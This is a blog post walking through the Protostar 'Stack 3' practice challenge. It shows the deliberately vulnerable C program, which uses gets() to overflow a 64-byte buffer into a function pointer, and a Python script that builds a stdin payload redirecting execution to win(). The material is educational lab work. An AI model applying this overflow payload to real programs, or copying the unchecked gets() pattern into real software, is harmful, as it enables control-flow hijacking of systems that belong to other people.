Saturday, March 25, 2017

Changing code flow in Protostar | Stack 3

Hello guys,

So today I'll be talking a little bit about how I solved the Stack 3 challenge in Protostar, whose goal is to change the code flow of the program.

If you're wondering what Protostar is, it is a Linux-based virtual machine image designed purely for practicing binary exploitation skills.
You can download protostar from here : https://exploit-exercise.com

So first, I looked at the source code of the vulnerable program, which is available on the website itself.

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

void win()
{
  printf("code flow successfully changed\n");
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf("calling function pointer, jumping to 0x%08x\n", fp);
      fp();
  }
}

So this is the code on the website.

Now, if you look at the code, you'll notice that this program never reaches win() on its own.
fp is set to 0 and nothing in the program ever changes it, so the if(fp) check is always false: fp() is never called, and even if it were, nothing has pointed it at win().

If you know a little bit of C, this is easy to understand.

Now, if you look closely, there is one more interesting thing in this code: it uses gets(), which does no bounds checking and is therefore vulnerable to a buffer overflow. buffer is only 64 bytes, but gets() keeps writing until it sees a newline or end of input, so anything past the 64th byte lands on whatever sits above buffer on the stack, and in this program that is fp.

So now we have one way to exploit this vulnerability: overflow buffer so that the bytes past it overwrite fp with the address of win(). For me that was a little bit tough, so I chose the easier way: using gdb, set fp to the address of win() before the if(fp) check runs.

Then the check passes and the program jumps to win().
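The gdb route only pokes the variable by hand; it proves that fp controls the jump but does not exercise the gets() bug. The overflow route is the one the challenge is built around, so here is an added example of it (my code, not part of the original post or of Protostar): a small script that pulls the address of win out of objdump -d output and builds the stdin payload. It assumes the Protostar layout, where fp sits directly above buffer with no padding between them, so exactly 64 bytes of filler are followed by the 4-byte little-endian address; if your build places fp differently, the filler length changes, and the way to check is to look at the disassembly of main or to watch the crash address in gdb. The embedded objdump sample is constructed for offline use and its addresses are illustrative.

```python
import re
import struct
import sys

BUFFER_SIZE = 64  # char buffer[64] in the Stack 3 source

# A function header in `objdump -d` output looks like "08048424 <win>:".
_SYMBOL_RE = re.compile(r"^([0-9a-fA-F]{8}) <(\w+)>:\s*$", re.MULTILINE)


def find_symbol(objdump_text: str, name: str) -> int:
    """Return the address of function `name` parsed from `objdump -d` text."""
    for match in _SYMBOL_RE.finditer(objdump_text):
        if match.group(2) == name:
            return int(match.group(1), 16)
    raise KeyError(f"symbol {name!r} not found in objdump output")


def build_payload(win_addr: int) -> bytes:
    """Build the stdin payload that overwrites fp with win_addr.

    Assumption (true for the Protostar binary): fp sits directly above
    buffer in main()'s frame, so the first 64 bytes fill buffer and the
    next 4 bytes land on fp. Protostar is 32-bit little-endian x86, hence
    the "<I" pack format.
    """
    if not 0 <= win_addr <= 0xFFFFFFFF:
        raise ValueError("win_addr must fit in 32 bits")
    payload = b"A" * BUFFER_SIZE + struct.pack("<I", win_addr)
    # gets() stops at the first newline, so a 0x0a byte anywhere in the
    # payload (including inside the packed address) would truncate it.
    # NUL bytes are fine: gets() reads straight through them.
    if b"\n" in payload:
        raise ValueError("payload contains a newline byte; gets() would truncate it")
    return payload


# Constructed sample of `objdump -d stack3` output for offline use; the
# addresses are illustrative and not taken from the challenge binary.
SAMPLE_OBJDUMP = (
    "08048424 <win>:\n"
    " 8048424:\t55                   \tpush   %ebp\n"
    " 8048425:\t89 e5                \tmov    %esp,%ebp\n"
    "\n"
    "08048438 <main>:\n"
    " 8048438:\t55                   \tpush   %ebp\n"
)


if __name__ == "__main__":
    # Usage: objdump -d stack3 | python3 stack3_payload.py > payload
    #        ./stack3 < payload
    addr = find_symbol(sys.stdin.read(), "win")
    sys.stdout.buffer.write(build_payload(addr) + b"\n")
```

On success stack3 prints "calling function pointer, jumping to 0x..." with the address of win, followed by "code flow successfully changed". If it instead segfaults, the filler length is wrong for your build: the value printed by the program (or the faulting address in gdb) shows which bytes of your input ended up in fp, which tells you how far to shift the address.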

So let's do this.

I made a video on it for better understanding; here it is:


Drop your comments on the video if something is unclear to you.

